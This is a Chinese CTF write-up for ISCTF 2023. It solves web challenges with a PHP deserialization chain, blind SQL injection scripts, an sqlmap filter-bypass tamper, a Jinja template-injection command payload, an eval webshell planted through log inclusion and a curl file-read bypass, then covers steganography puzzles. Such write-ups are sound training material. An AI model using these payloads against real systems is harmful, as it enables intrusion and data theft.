ISCTF 2023 WriteUp

ISCTF WriteUp

其他比赛做不出来题,闲着没事也来ISCTF看看题,就当锻炼锻炼了,运气好拿到了社会榜第8,虽然有些题目挺简单的,把web做出来还剩最后4道没想法的题没做,就跑去misc拼脑洞了,感觉有点费时间了

就写一下自己做出来的web和misc还有一道crypto吧

Web

圣杯战争!!!

一道入门反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "为Saber选择了对的武器!<br>";
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "蓄力!咖喱棒!!<br>";
        return $functioin();
    }
}
class saber{
    public $weapon;
    public function __invoke(){
        echo "胜利!<br>";
        include($this->weapon);
    }
}
class summon{
    public $Saber;
    public $Rider;

    public function __wakeup(){
        echo "开始召唤从者!<br>";
        echo $this->Saber;
    }
}

if(isset($_GET['payload'])){
    unserialize($_GET['payload']);
}
?>

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "为Saber选择了对的武器!<br>";
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "蓄力!咖喱棒!!<br>";
        return $functioin();
    }
}
class saber{
    public $weapon="php://filter/convert.base64-encode/resource=flag.php";
    public function __invoke(){
        echo "胜利!<br>";
        include($this->weapon);        
    }
}
class summon{
    public $Saber="111";
    public $Rider;

    public function __wakeup(){
        echo "开始召唤从者!<br>";
        echo $this->Saber;
    }
}

if(isset($_GET['payload'])){
    unserialize($_GET['payload']);
}

$A = new summon();
$B = new artifact();
$C = new prepare();
$D = new saber();
$A->Saber = $B;
$B->excalibuer = $C;
$C->release = $D;
echo urlencode(serialize($A));
?>

php://filter/协议读文件就行了

1
O%3A6%3A%22summon%22%3A2%3A%7Bs%3A5%3A%22Saber%22%3BO%3A8%3A%22artifact%22%3A2%3A%7Bs%3A10%3A%22excalibuer%22%3BO%3A7%3A%22prepare%22%3A1%3A%7Bs%3A7%3A%22release%22%3BO%3A5%3A%22saber%22%3A1%3A%7Bs%3A6%3A%22weapon%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A5%3A%22arrow%22%3BN%3B%7Ds%3A5%3A%22Rider%22%3BN%3B%7D

where_is_the_flag

1
2
3
4
5
6
7
<?php
//flag一分为3,散落在各处,分别是:xxxxxxxx、xxxx、xxx。
highlight_file(__FILE__);

//标准一句话木马~
eval($_POST[1]);
?>

蚁剑直接连,翻文件

根目录下的start.sh已经说了flag的位置

绕进你的心里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){
    echo "md5绕过了!";
    if(preg_match("/[0-9]/", $num)){
        die('你干嘛?哎哟!');
    }
    elseif(intval($num)){
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }
        echo $flag;
    }
}
?>

数组绕过加回溯绕过preg_match/s模式,跟shctf很像

1
2
3
4
import requests

res = requests.post("http://43.249.195.138:22173/?hongmeng[]=1&shennong[]=2&zhurong[]=1",data = {"pan_gu":"-"*1000000+"2023ISCTF"})
print(res.text)

easy_website

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /check.php HTTP/1.1
Host: 43.249.195.138:22205
Content-Length: 29
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://43.249.195.138:22205
Referer: http://43.249.195.138:22205/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

username=admin&password=admin

保存到1.txt ,

写一下sqlmap的tamper,简单替换被过滤的字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):


    retVal = payload
    retVal = retVal.replace("SELECT", "SELSELECTECT")
    retVal = retVal.replace("AND", "ANANDD")
    retVal = retVal.replace("OR", "OORR")
    retVal = retVal.replace(" ", "/**/")


    return retVal

1
sqlmap -r 1.txt --dbs --batch --tamper isctf.py

注意最后爆字段的时候,那个“password”字段需要改成passwoorrd来绕过

wafr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
/*
Read /flaggggggg.txt
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);

if(preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $_POST['code'])){//strings
    die("想读我文件?大胆。");
}
elseif (preg_match("/\^|\||\~|\\$|\%|jay/i", $_POST['code'])){
    die("无字母数字RCE?大胆!");
}
elseif (preg_match("/bash|nc|curl|sess|\{|:|;/i", $_POST['code'])){
    die("奇技淫巧?大胆!!");
}
elseif (preg_match("/fl|ag|\.|x/i", $_POST['code'])){
    die("大胆!!!");
}
else{
    assert($_POST['code']);
}

用paste来读文件就好了

ez_ini

.user.in日志包含

1
auto_append_file=/var/log/nginx/access.log

UA头写马,然后命令执行

1
<?php eval(@$_POST['a']); ?>
1
1=system("cat /f*");

webinclude

目录扫描扫到一个index.bak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 function string_to_int_array(str){
        const intArr = [];

        for(let i=0;i<str.length;i++){
          const charcode = str.charCodeAt(i);

          const partA = Math.floor(charcode / 26);
          const partB = charcode % 26;

          intArr.push(partA);
          intArr.push(partB);
        }

        return intArr;
      }

      function int_array_to_text(int_array){
        let txt = '';

        for(let i=0;i<int_array.length;i++){
          txt += String.fromCharCode(97 + int_array[i]);
        }

        return txt;
      }


const hash = int_array_to_text(string_to_int_array(int_array_to_text(string_to_int_array(parameter))));
if(hash === 'dxdydxdudxdtdxeadxekdxea'){
            window.location = 'flag.html';
          }else {
            document.getElementById('fail').style.display = '';
          }

拿脚本爆破出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
function string_to_int_array(str){
    const intArr = [];

    for(let i=0;i<str.length;i++){
        const charcode = str.charCodeAt(i);

        const partA = Math.floor(charcode / 26);
        const partB = charcode % 26;

        intArr.push(partA);
        intArr.push(partB);
    }

    return intArr;
}

function int_array_to_text(int_array){
    let txt = '';

    for(let i=0;i<int_array.length;i++){
        txt += String.fromCharCode(97 + int_array[i]);
    }

    return txt;
}
function generateStrings(length, prefix = '') {
    const alphabet = 'abcdefghijklmnopqrstuvwxyz';
    if (length === 0) {
        const hash = int_array_to_text(string_to_int_array(int_array_to_text(string_to_int_array(prefix))));
        if(hash === 'dxdydxdudxdtdxeadxekdxea'){
            console.log(prefix);
        }
        //console.log(prefix);
        return;
    }

    for (let i = 0; i < alphabet.length; i++) {
        const newPrefix = prefix + alphabet[i];
        generateStrings(length - 1, newPrefix);
    }
}

for (let i = 1; i <= 8; i++) {
    console.log(`Length ${i}:`);
    generateStrings(i);
}

跑出来是mihoyo

然后就是打include了

1
?mihoyo=php://filter/convert.base64-encode/resource=flag.php

fuzz!

唉,这真是第三次做这个题了,第一次在ctftime的一个比赛,第二次是自己学校的萌新赛,第三次就是这次

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
/*
Read /flaggggggg.txt
Hint: 你需要学会fuzz,看着键盘一个一个对是没有灵魂的
知识补充:curl命令也可以用来读取文件哦,如curl file:///etc/passwd
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
$file = 'file:///etc/passwd';
if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){
    die('你需要fuzz一下哦~');
}
if(!preg_match("/fi|le|flag/i", $_GET['file'])){
    $file = $_GET['file'];
}
system('curl '.$file)

curl支持统配

1
curl file:///f[a-z]ag
1
/?file=f[i-i]l[e-e]:///fl[a-a]ggggggg.txt

1z_Ssql

给了两个表

1
2
3
4
5
6
7
8
9
10
11
12
users
u55qs4hftj
flag1
bikepedcrash
guestbook
sheet1
kaohe23
servers
user
admin
books
orders
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
edtime
password
user
flag
username
listtag
tid
posttime
homepage
qq
position
showmod
keyword
sta
rpurl
statement_latency
statement_avg_latency
hack123

访问/robots.txt有提示

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file("here_is_a_sercet.php");

function waf($str){
    $black_list = "762V08zk+xrmKxIFrdJIJj6ULvI8Lc0pX39LjDyIUb0eAGkZe4KQa87TJXuqnFw0u/669wWRsqYFya812FtULw9+tpiGlaH2gleDfDKzr+g=";
    if (preg_match($black_list,$str)){
        die("<h4>illegal words!</h4>");
    }
    return $str;
}

?>

这里面有个就是被ban的字符,不过被加密的,f12查看js文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
const SM4 = require("gm-crypt").sm4;

var payload = "xxx";

let sm4Config = {
    key: "B6*40.2_C9#e4$E3",
    mode: "ecb",
    cipherType: "base64"
};
let sm4 = new  SM4(sm4Config);

var result = sm4.decrypt(payload);

console.log("解密:" + result)

这应该就是用来解密的

1
解密:/union|=|+|sleep|benchmark|for|where|sys|innodb|is|null|like|/*|*//i

ban了挺多东西的,但ban掉了for导致无法注入出表名等内容

这里使用盲注,结合它给的表,找出正确的表名和字段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
url = "http://43.249.195.138:20542/index.php"

tabs = ['users', 'u55qs4hftj', 'flag1', 'bikepedcrash', 'guestbook', 'sheet1', 'kaohe23', 'servers', 'user', 'admin', 'books', 'orders']
cols = ['edtime', 'password', 'user', 'flag', 'username', 'listtag', 'tid', 'posttime', 'homepage', 'qq', 'position', 'showmod', 'keyword', 'sta', 'rpurl', 'statement_latency', 'statement_avg_latency', 'hack123']

for tab in tabs:
    print("in {}:".format(tab))
    for col in cols:
        payload = {
            "username": "' or ascii(substr((select group_concat({}) from {}),1,1))>1 #".format(col,tab),
            "password": "1"
        }
        r = requests.post(url=url,data=payload)
        if "You are so smart! Let me give you a hint" in r.text:
            print("{}->{}".format(tab,col))

for tab in cols:
    print("in {}:".format(tab))
    for col in tabs:
        payload = {
            "username": "' or ascii(substr((select group_concat({}) from {}),1,1))>1 #".format(col,tab),
            "password": "1"
        }
        r = requests.post(url=url,data=payload)
        if "You are so smart! Let me give you a hint" in r.text:
            print("{}->{}".format(tab,col))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
url = "http://43.249.195.138:20542/index.php"
result = ""
for i in range(1, 100):
    min_value = 33
    max_value = 130
    mid = (min_value+max_value)//2
    while (min_value < max_value):
        payload = {
            "username": "' or ascii(substr((select group_concat(password) from users),{},1))>{} #".format(i,mid),
            "password": "1"
            }
        html = requests.post(url=url, data=payload)
        if "You are so smart! Let me give you a hint" in html.text:
            min_value = mid+1
        else:
            max_value = mid
        mid = (min_value+max_value)//2
    if (chr(mid) == " "):
        break
    result += chr(mid)
    print(result)

爆出登录的账号密码,然后登录就有flag

恐怖G7人

给我一种是xxs的感觉,但其实是最简单的ssti,没有任何过滤

1
{{lipsum.__globals__['os'].popen('env').read()}}

直接出flag

值得记一下的是,这种cookie是python pickle生成的cookie,当然在这题没用

1
gASVTwAAAAAAAAB9lCiMBG5hbWWUjDB7e2xpcHN1bS5fX2dsb2JhbHNfX1snb3MnXS5wb3BlbignZW52JykucmVhZCgpfX2UjAtpc19jaGFtcGlvbpRLAHUu

Misc

签到题

关注公众号,回复关键词:小蓝鲨,我想打ctf

你说爱我?尊嘟假嘟

改后缀为.zip,解压,得到doc文件

你说爱我->Ook.

尊嘟->Ook!

假嘟->Ook?

小蓝鲨的秘密

有意思的伪加密,formost和binwalk都不能直接提取

将0900改成0000

解压得到一个png图片,和txt文件:

1
2
3
可爱的小蓝鲨不知道这个字符串是什么,强大的你,你能告诉小蓝鲨吗?

U2FsdGVkX1/ij5Hxtt6G8tDvbXIQcMLJ6isLpLmxqxW8mOmFIB4DgBGXSR3ceEcj

png 执行crc爆破出正确的宽高

得到密匙:15CTF2023

再去aes解密AES加密-AES解密-在线AES加密解密工具

杰伦可是流量明星

给了个mp3文件,010查看,发现、

改为rar后缀,解压
有个流量包

真有意思,要是formost直接分解之前那个mp3,会有一张图片,和一个登录框的html文件

tcp流中找到flag

easy_zip

ARCHPR爆破得到解压密码

解压,打开里面的txt就是flag

蓝鲨的福利

png头需要补齐字节89 50 4E 47 0D 0A 1A 0A

保存,然后改后缀为png

Ez_misc

解压,有一个被加密的zip和一个key.ppt

ppt打开可以看到给的一些密码

1
2
3
4
P@ssW0rd
Password
Passisctf
isctf2023

然而真正的密码在角落

解压得到一个无法正常解析的jpg

缺了文件头FFD8FFE0,补上

可以看出是二维码

spalshes

一个zip,一个txt:

1
2
3
作为一个强大的CTFer,我相信你能破解这其中的奥秘的。

MSwyLjc1LDEsMSwyLjUsMSwxLDIuMjUsMSwxLDEuNzUsMSwxLDIsMSwxLDMsMSwxLjUsMywxLDIsMywxLDIsMi43NSwxLDIsMi41LDEsMiwyLjI1LDEsMiwyLDEsMiwxLjc1LDEsMiwxLjUsMSwxLDIuMjUsMSwxLjUsMi4yNSwxLDEsMS41LDEsMS41LDEuNSwxLA0KNCwyLjc1LDEsNCwyLjUsMSwzLDMsMSwzLjUsMywxLDQsMywxLDMuNSwyLjI1LDEsNCwyLjI1LDEsNCwyLDEsNCwxLjc1LDEsNCwxLjUsMSwzLDEuNSwxLDMuNSwxLjUsMSwzLDIuMjUsMSwzLDIuNSwxLDMsMi43NSwxLA0KNSwzLDEsNS41LDMsMSw2LDMsMSw2LDIuMjUsMSw2LDIsMSw2LDEuNzUsMSw2LDEuNSwxLDUuNSwxLjUsMSw1LDEuNSwxLDUsMi4yNSwxLDUuNSwyLjI1LDEsNSwyLjUsMSw1LDIuNzUsMSwNCjcsMywxLDcuNSwzLDEsOCwzLDEsOCwyLjUsMSw4LDIsMSw4LDEuNSwxLDgsMi43NSwxLDgsMi4yNSwxLDgsMS43NSwxLA0KOSwzLDEsOS41LDMsMSwxMCwzLDEsMTAsMi43NSwxLDEwLDIuNSwxLDEwLDIuMjUsMSw5LjUsMi4yNSwxLDksMi4yNSwxLDksMS41LDEsOS41LDEuNSwxLDEwLDEuNSwxLDEwLDIsMSwxMCwxLjc1LDEsDQoxMS41LDMsMSwxMiwzLDEsMTEsMywxLDEyLDIuMjUsMSwxMiwyLDEsMTIsMS43NSwxLDEyLDEuNSwxLDExLjUsMS41LDEsMTEsMS41LDEsMTEsMS43NSwxLDExLDIsMSwxMSwyLjI1LDEsMTEsMi41LDEsMTEsMi43NSwxLDExLjUsMi4yNSwx

base64解密:

1
2
3
4
5
6
1,2.75,1,1,2.5,1,1,2.25,1,1,1.75,1,1,2,1,1,3,1,1.5,3,1,2,3,1,2,2.75,1,2,2.5,1,2,2.25,1,2,2,1,2,1.75,1,2,1.5,1,1,2.25,1,1.5,2.25,1,1,1.5,1,1.5,1.5,1,
4,2.75,1,4,2.5,1,3,3,1,3.5,3,1,4,3,1,3.5,2.25,1,4,2.25,1,4,2,1,4,1.75,1,4,1.5,1,3,1.5,1,3.5,1.5,1,3,2.25,1,3,2.5,1,3,2.75,1,
5,3,1,5.5,3,1,6,3,1,6,2.25,1,6,2,1,6,1.75,1,6,1.5,1,5.5,1.5,1,5,1.5,1,5,2.25,1,5.5,2.25,1,5,2.5,1,5,2.75,1,
7,3,1,7.5,3,1,8,3,1,8,2.5,1,8,2,1,8,1.5,1,8,2.75,1,8,2.25,1,8,1.75,1,
9,3,1,9.5,3,1,10,3,1,10,2.75,1,10,2.5,1,10,2.25,1,9.5,2.25,1,9,2.25,1,9,1.5,1,9.5,1.5,1,10,1.5,1,10,2,1,10,1.75,1,
11.5,3,1,12,3,1,11,3,1,12,2.25,1,12,2,1,12,1.75,1,12,1.5,1,11.5,1.5,1,11,1.5,1,11,1.75,1,11,2,1,11,2.25,1,11,2.5,1,11,2.75,1,11.5,2.25,1

然后三维坐标绘图

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D

# 原始数据列表
raw_data = [
1,2.75,1,1,2.5,1,1,2.25,1,1,1.75,1,1,2,1,1,3,1,1.5,3,1,2,3,1,2,2.75,1,2,2.5,1,2,2.25,1,2,2,1,2,1.75,1,2,1.5,1,1,2.25,1,1.5,2.25,1,1,1.5,1,1.5,1.5,1,
4,2.75,1,4,2.5,1,3,3,1,3.5,3,1,4,3,1,3.5,2.25,1,4,2.25,1,4,2,1,4,1.75,1,4,1.5,1,3,1.5,1,3.5,1.5,1,3,2.25,1,3,2.5,1,3,2.75,1,
5,3,1,5.5,3,1,6,3,1,6,2.25,1,6,2,1,6,1.75,1,6,1.5,1,5.5,1.5,1,5,1.5,1,5,2.25,1,5.5,2.25,1,5,2.5,1,5,2.75,1,
7,3,1,7.5,3,1,8,3,1,8,2.5,1,8,2,1,8,1.5,1,8,2.75,1,8,2.25,1,8,1.75,1,
9,3,1,9.5,3,1,10,3,1,10,2.75,1,10,2.5,1,10,2.25,1,9.5,2.25,1,9,2.25,1,9,1.5,1,9.5,1.5,1,10,1.5,1,10,2,1,10,1.75,1,
11.5,3,1,12,3,1,11,3,1,12,2.25,1,12,2,1,12,1.75,1,12,1.5,1,11.5,1.5,1,11,1.5,1,11,1.75,1,11,2,1,11,2.25,1,11,2.5,1,11,2.75,1,11.5,2.25,1
    ]

# 将数据整理成类似 dot1 的格式
dot1 = []

# 将数据每3个元素分组,形成点的坐标列表
for i in range(0, len(raw_data), 3):
    dot1.append([raw_data[i], raw_data[i + 1], raw_data[i + 2]])

plt.figure()  # 得到画面
ax1 = plt.axes(projection='3d')
ax1.set_xlim(0, 15)  # X轴,横向向右方向
ax1.set_ylim(15, 0)  # Y轴,左向与X,Z轴互为垂直
ax1.set_zlim(0, 15)  # 竖向为Z轴
color1 = ['r', 'g', 'b', 'k', 'm']
marker1 = ['o', 'v', '1', 's', 'H']
i = 0
for x in dot1:
    ax1.scatter(x[0], x[1], x[2], c=color1[1],
                marker=marker1[1], linewidths=4)  # 用散点函数画点
    i += 1
plt.show()

拿去解压zip得到flag

PNG的基本食用

给了三张图片

第一张crc爆破

第二张,lsb隐写

第三张,zsteg一把梭,formost分离文件也可以分离出rar文件再解压,也可以

小猫

fomost分离出来另一张图片

后面发现真的没啥软用

最初那个照片可以看见左上角有些数据

发现有个jpg头,保存下来并去掉前面多余的部分,得到

然后就是对照前面的坐标,转化成这些社会核心价值观

再社会主义核心价值观解密就行了

MCSOG-猫猫

零宽隐写

直接将其粘贴进linux终端是这样的

1
<200c><200c><200c><200c><200c><200c><200c><202c><202c><200c><200e><200c><200c><200c><200c><200c><200c><200e><200c><200c><200c><202c><200c><200c><200c><200c><200c><200c><200c><202c><200e><200e><200e><200c><200c><200c><200c><200c><200c><200e><200c><200c><200e><200c><200c><200c><200c><200c><200c><200c><200c><202c><200e><202c><200e><200c><200c><200c><200c><200c><200c><200e><200e><200e><202c><200c><200c><200c><200c><200c><200c><200c><200e><200c><200e><200c><200e><200c><200c><200c><200c><200c><200c><200e><200e><200c><200e><200c><200c><200c><200c><200c><200c><200c><200e><200c><200e><200e><200c><200c><200c><200c><200c><200c><200c><200c><202c><200e><202c><200e><200c><200c><200c><200c><200c><200c><200c><200e><202c><200e><200c><200c><200c><200c><200c><200c><200c><200e><200e><200c><200e><200c><200c><200c><200c><200c><200c><200c><200c><202c><202c><202c><200e><200c><200c><200c><200c><200c><200c><200c><200e><202c><200c><200e><200c><200c><200c><200c><200c><200c><200c><202c><202c><200e><200e><200c><200c><200c><200c><200c><200c><200e><200e><200c><200c><200c><200c><200c><200c><200c><200c><200c><200e><200c><202c><202c><200c><200c><200c><200c><200c><200c><200c><200c><202c><202c><200c><200e><200c><200c><200c><200c><200c><200c><200e><200c><200e><200e><202c><200c><200c><200c><200c><200c><200c><200c><202c><200e><200e><200c><200c><200c><200c><200c><200c><200c><200e><200e><200e><200c><200c><200c><200c><200c><200c><200c><200c><200e><200c><200e><200e><202c><200c><200c><200c><200c><200c><200c><200c><202c><200e><200e><202c><200c><200c><200c><200c><200c><200c><200c><200e><202c><202c><200e><200c><200c><200c><200c><200c><200c><200c><202c><202c><202c><200c><200c><200c><200c><200c><200c><200c><200e><200c><202c><200e><200e><200c><200c><200c><200c><200c><200c><200e><200c><200e><200e><202c><200c><200c><200c><200c><200c><200c><200e><200e><200c><202c><200c><200c><200c><200c><200c><200c><200c><200c><200e><202c><202c><200c><200c><200c><200c><200c><200c><200c><200c><202c><202c><202c><200c><200c><200c><200c><200c><200c><200c><200e><200e><200e><202c><202c>flag我来啦

stream

先看http流,发现是sql盲注流量

选择每个盲注位置最后的那个值,然后ascii转字符就好了

当时自己是手搓的,没得脚本

一心不可二用

给了个apk包,导入模拟器发现是有些,反编译也没看出什么,后来发现题目跟和半毛钱关系都没有。。。

直接将apk解包

在Daddy_Was_A_Thief\res\drawable路径下有个flag.zip

解压需要密码

还附带了个python报错信息,一直没搞懂这是什么

然后思路一直是apk的其他位置或者反编译或者游戏中有解压密码

浪费了好长时间都没有

最后发现密码就是

太抽象了吧

小蓝鲨的问卷

填问卷,得flag

张万森,下雪了

给了个字典和加密的zip

用它给的字典爆破出压缩包密码blueSHARK666

flag.txt,但不是真的flag

1
ISCTF{837ski-28374hd70-3017263j4-9sjhx}

tip.txt

一堆字符,先base一下(套了17层base64)

1
CIcTpGI3CjMSCTYFdoCTNIIXpIbXZ0ISCadICZI39IbSJYII2CMISxSnSjIE5YFmxaeISXNICSZTp0SmpIYSCXFXdIMGZTSmxacSCICIdTbIpSSmpCYSTXCXTFaFxqFm2IcISCNFNSSmZySmxaC2CIbDZIZCSTSDIadGIGFTdSZF0ESCIaYIZ0S30jZ2ZOY3CIIICGITdSMSS5FF5OSGJGImIIa2C2S3CZeIdICGpSZnB5I3S3b2FyI3djZIpXYICZeITFZmIjMF52SG2IF2YCaG9IbX00CDAIeGJSIT00M2JxIS0IS2dIbICXbXZSYTSIMITSa0NXZTpCSF53SmJFZT0IMIpXYFxac2dCbINNSXACSmxjeE20FX0FbGZYSTdoISTIaINIMSJXSm5OC2JIcETFbIF2YFCacmJESmIISnBFSmxaYF5IInSXbGZpFm5CeSCqQmCIMF5GC2CoaSJFSm9FSm0DFFxadGNIcE5IbIY2SIxob2C0InNCbGZaYT0IM2CCeGIjSTJTC2CIFFJZITpXbIC0CDJ3Z2dYaIZ0Mn0XIIxobFZIITSZIG0FSmCaeTTSImC0ZTS5CEZIS2YCQ30IMjIXSjIIdSZCbINSZnBaSTdIIFSyIX0XbTJOS3C3cTZSF3NOZTpTCTCOaSJZbDCISCSTSm23Z2NFcIdNZnByICJ4YSCIInZ0Z35XFTSINTCIF3CNZ2I4S203CTCCaIdCS2MxSTCIcTCFCIZNIEJXSjSxMIdGIXdXaF0aSTdIeTTII3CXS3CCY3C3aSCISjNIbXB0SG2IZFNIImIIMn0FIIx3bFSIIT0jZF5aSm24IIYyNSNFMSpICTCISmJYa0pFbIpyCI2OZ2p0aINNIEJYS2ZCYIExC0JNSIZYYmxIIITIaE9OZmC4SFCTa2CCFnpCMIpZYSCOZTNIITdSZT4TSGCaFmSIFTTSZTCoCIx3b2CXcECOZTp0SIx3SFJZNSBCa2p2CFCIZTdZOSdISECXSGxIQ2YyITT0IEpXYCJICI3yMF9CZTC0SF2IS2JIb2TIMSJDISdNeIdICIZSbIpoSITxFFNGSnIIa2ZYSm2IIICCMDS0ZCIXY3ZOSSCCaExIZ200FjIOcFIGSTdNMEpCSm2TYIMxITdCb3pQSmx3SITZInCTZTpyI3ZIaE2ZIT0IMnZ0SjI3IISIbIp0MXACISSac2CICnJPS2BOSjIJeICIY20NZTS5FFx3SGJIcITCaFZICDI3S2CFZTdNIEJSSm24IFIIIX0CbmxXFmxIaIpEITdjMIZCY3dIFT2GcITIZmQICDJISFECCI0SSGxCIICacT5IIT0NSCTYFmxIeT3IF39IMDISSIxoSmJYaDNSMGZPFTd3Z2pGCGT0M0BMSmTIeGQxCnZIa2pPSTdoSITFZndFMSpTCSZIS32Xe0TIbCSZSTC3c2NIaI00M3TxS3dCeIYxC0S0ZTpOYmx3b2dXdGICST24I30IaTJCaG9FSm0DYjI3S2dCdIZNSXAIS3dTa2YyI300Zm0SS3SaCIYIImIIMIZTFmxISFEydCIISEoIYCICeSNZCI0SSGxISmxaI2dGITCXbFCCCSdIMISCMCBFbFp0YTCISFIZInCCe3CCYCI3cFIGImTIZ20YS2dTYSMxC3dXIGZYYTSacTSqQCIIMSI4SF2TST2ZcEpSS2B0SjJGcmECaICTa2p0ITCaIFZICnZjZ35YFjJob2CZImpNSTJTSmC3IId0FT0Ia2p0STCIS2pGCmxIbEp6SjJCNIIGInJjI0BaS3F2cTCqI3CIS3pxSGxaS2JIcDCIa3J0SCI3IINZCIdSZF0FSIcxb2TIIX0CMF0IYXpGISC0eGCIM3pyCTC3ImEyFTZCMSpXCEdIIIJCeINSIEJ3S3CIF2YxITCNSmZqFT0CYSTFZ3CXZmZXSFCTIIJIIn0IZ20ZSCI3SFN0OS0XIEJMSXpGI2YxSnSFbGZpFjI3d2CCcECSMSJCS20oIGJYFTBSbXN4C3C3cTCCOSCNa2Y2ISSaF2dCZX0jZF0XCFCIaIpISCIIbIJCSmx3aSNIICJIbCB2CFCJeIpSCT0XZ2JQSmTxb2Yxb0N0ZCTIY3d4S2YydDB0bFYFSmx3SF2IcDNIMIpPFmxOcFJGCIdISC02S2CIZ2dCS3daIICIY3F2cIYII3CSZmZXSII5F32SNXpIMn0SY3C3NmJSQTSIM2JoITd4YSN0F30PSFxCYCNBd2dISmISMIZCSFCaIGJXaG0Ia35SS3CZeIS0dGCIa2B6SFCaaFIIM0dCSECXYCI3IIdIITCTZTpCY3CIaE2YQn0IS2Z0ISC3ZFJGaGCCZ2JQIICaIFSIIXTTIGZoCFZGZTSCe0dIMSoFFm5aSFExcIBSbX0PYCJOZ2p0bI0ISXBISm24F2MxIX0CIGxSYCIIIITZSCIjZTCCSIx3S2CIcE0IMjEISmIxZSJIaIdSSICFIICaIFNZNS0PSTpoYCBIISCGF3djbSI4I30ISIJ0F39IbG0DCmx3SSICdGTNS20YSCJTYIIIInZ0Zm0aSjNIaIYIInNObEp2I3COCmExcEpXS2Z0YjISeSJYcIJSSSpYIIxoFFIGCIdaZSpIFmxIITTSITd0S3T4FF53S2C6ZCBaZECZSjJ3ISNCZTN0eTCaSmTIeE50SnNXbTJIFjNISTZIIndTbGC2SF5OITCIcI0CMIpDSjAxIISZaISSIG0MIXp3Z2SyC3COS35pYCBINSCCcEdCSmxXSI0oIId0aITCbXZ0SjIIcTpGCmpIbIoISGxIC2dGInZSb0BaCFCCd2CFQX0IbFpISIx3SFSIITSXSTp0FCJIIIJZCICSZTpYITdTYF2ICI0jZIZaSjI3ISC0dGI0MFpSSmxIImEyFXpFSTp0STC3dE9XbE50MXBCSTZJMSFyZ3dCb35FY3doSTCICINIZTpySF2GF2CZcDBSbCEISCIaZTdIcIdIZSpyI3ZGFFMxC0SFbIxOCIx3ITdXdGICS2JCY3CIFFJSQnJFSSJ0STC3cTdICm0IaFIFISSaa2dGIXpSb3pXFjNONICqZmC3STJCYFdoC32ScDSIbGZ2FjIIS2ZFCmTCZXBCIIxoF2CIb0NIbmZIY3CaMI3ISCSXZ3pCYTZCS2YCQm0XSTp0STCIc2IIcE5SaCETSm2IZFEyF30IaFZSYTd4b2ZSaENSbIpTCFdIaT2EZT0SbCSCSjJ3c35IbIpSIG0MICIaSFMxcEdFbG0XYT0oNTCqIX0IMSp0FF5OaTJXeICCa2paCDIISTdCZmpSSCSGSSd4a2YySnNXa2CXYTZCNIS6ZmCIMSp2FmxIaSJFQTBIbCAxFCJJeIpGSTNSSSpISIC3F2dISnZ3Z2ZaSmCISTCCeG9ISTpCSFpOS32FaG0Ce3CXYF2OZ35ICG0Ta2S4SmxjeE50ZX0XaF0FYmI2SSTIFnNIMSJISF2GSSJIc00SbCSPSTCJeINZbICSIG0YSTZ3I2N0FjCZbGZoYCJ2